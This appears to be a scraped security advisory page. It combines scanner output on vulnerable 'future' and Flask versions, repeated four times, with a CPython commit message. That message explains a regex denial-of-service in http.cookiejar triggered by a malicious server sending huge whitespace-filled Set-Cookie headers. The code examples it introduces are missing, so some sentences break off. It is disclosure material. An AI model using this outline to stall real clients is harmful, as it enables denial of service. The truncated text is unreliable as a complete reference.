GHSA-m2qf-hxjv-5gpq
52510: future <=0.18.2 resolved (0.16.0 installed)! Future 0.18.2 and earlier allows remote attackers to cause a denial of service via crafted Set-Cookie header from malicious web server. https://github.com/PythonCharmers/python-future/blob/master/src/future/backports/http/cookiejar.py#L215 python/cpython#17157 55261: flask <2.2.5 resolved (2.0.2 installed)! Flask 2.2.5 and 2.3.2 include a fix for CVE-2023-30861: When all of the following conditions are met, a response containing data intended for one client may be cached and subsequently sent by the proxy to other clients. If the proxy also caches 'Set-Cookie' headers, it may send one client's 'session' cookie to other clients. The severity depends on the application's use of the session and the proxy's behavior regarding cookies. The risk depends on all these conditions being met: 1. The application must be hosted behind a caching proxy that does not strip cookies or ignore responses with cookies. 2. The application sets 'session.permanent = True' 3. The application does not access or modify the session at any point during a request. 4. 'SESSION_REFRESH_EACH_REQUEST' enabled (the default). 5. The application does not set a 'Cache-Control' header to indicate that a page is private or should not be cached. This happens because vulnerable versions of Flask only set the 'Vary: Cookie' header when the session is accessed or modified, not when it is refreshed (re-sent to update the expiration) without being accessed or modified. GHSA-m2qf-hxjv-5gpq
52510: future <=0.18.2 resolved (0.16.0 installed)! Future 0.18.2 and earlier allows remote attackers to cause a denial of service via crafted Set-Cookie header from malicious web server. https://github.com/PythonCharmers/python-future/blob/master/src/future/backports/http/cookiejar.py#L215 python/cpython#17157 55261: flask <2.2.5 resolved (2.0.2 installed)! Flask 2.2.5 and 2.3.2 include a fix for CVE-2023-30861: When all of the following conditions are met, a response containing data intended for one client may be cached and subsequently sent by the proxy to other clients. If the proxy also caches 'Set-Cookie' headers, it may send one client's 'session' cookie to other clients. The severity depends on the application's use of the session and the proxy's behavior regarding cookies. The risk depends on all these conditions being met: 1. The application must be hosted behind a caching proxy that does not strip cookies or ignore responses with cookies. 2. The application sets 'session.permanent = True' 3. The application does not access or modify the session at any point during a request. 4. 'SESSION_REFRESH_EACH_REQUEST' enabled (the default). 5. The application does not set a 'Cache-Control' header to indicate that a page is private or should not be cached. This happens because vulnerable versions of Flask only set the 'Vary: Cookie' header when the session is accessed or modified, not when it is refreshed (re-sent to update the expiration) without being accessed or modified. GHSA-m2qf-hxjv-5gpq
52510: future <=0.18.2 resolved (0.16.0 installed)! Future 0.18.2 and earlier allows remote attackers to cause a denial of service via crafted Set-Cookie header from malicious web server. https://github.com/PythonCharmers/python-future/blob/master/src/future/backports/http/cookiejar.py#L215 python/cpython#17157 55261: flask <2.2.5 resolved (2.0.2 installed)! Flask 2.2.5 and 2.3.2 include a fix for CVE-2023-30861: When all of the following conditions are met, a response containing data intended for one client may be cached and subsequently sent by the proxy to other clients. If the proxy also caches 'Set-Cookie' headers, it may send one client's 'session' cookie to other clients. The severity depends on the application's use of the session and the proxy's behavior regarding cookies. The risk depends on all these conditions being met: 1. The application must be hosted behind a caching proxy that does not strip cookies or ignore responses with cookies. 2. The application sets 'session.permanent = True' 3. The application does not access or modify the session at any point during a request. 4. 'SESSION_REFRESH_EACH_REQUEST' enabled (the default). 5. The application does not set a 'Cache-Control' header to indicate that a page is private or should not be cached. This happens because vulnerable versions of Flask only set the 'Vary: Cookie' header when the session is accessed or modified, not when it is refreshed (re-sent to update the expiration) without being accessed or modified. GHSA-m2qf-hxjv-5gpq
52510: future <=0.18.2 resolved (0.16.0 installed)! Future 0.18.2 and earlier allows remote attackers to cause a denial of service via crafted Set-Cookie header from malicious web server. https://github.com/PythonCharmers/python-future/blob/master/src/future/backports/http/cookiejar.py#L215 python/cpython#17157 55261: flask <2.2.5 resolved (2.0.2 installed)! Flask 2.2.5 and 2.3.2 include a fix for CVE-2023-30861: When all of the following conditions are met, a response containing data intended for one client may be cached and subsequently sent by the proxy to other clients. If the proxy also caches 'Set-Cookie' headers, it may send one client's 'session' cookie to other clients. The severity depends on the application's use of the session and the proxy's behavior regarding cookies. The risk depends on all these conditions being met: 1. The application must be hosted behind a caching proxy that does not strip cookies or ignore responses with cookies. 2. The application sets 'session.permanent = True' 3. The application does not access or modify the session at any point during a request. 4. 'SESSION_REFRESH_EACH_REQUEST' enabled (the default). 5. The application does not set a 'Cache-Control' header to indicate that a page is private or should not be cached. This happens because vulnerable versions of Flask only set the 'Vary: Cookie' header when the session is accessed or modified, not when it is refreshed (re-sent to update the expiration) without being accessed or modified. GHSA-m2qf-hxjv-5gpq
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).
LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.
The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to
Therefore, a long sequence of spaces can trigger bad performance.
Matching a malicious string such as
caused catastrophic backtracking.
The fix removes ambiguity about which \s* should match a particular
space.
You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.
This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.
Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :
The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):
https://bugs.python.org/issue38804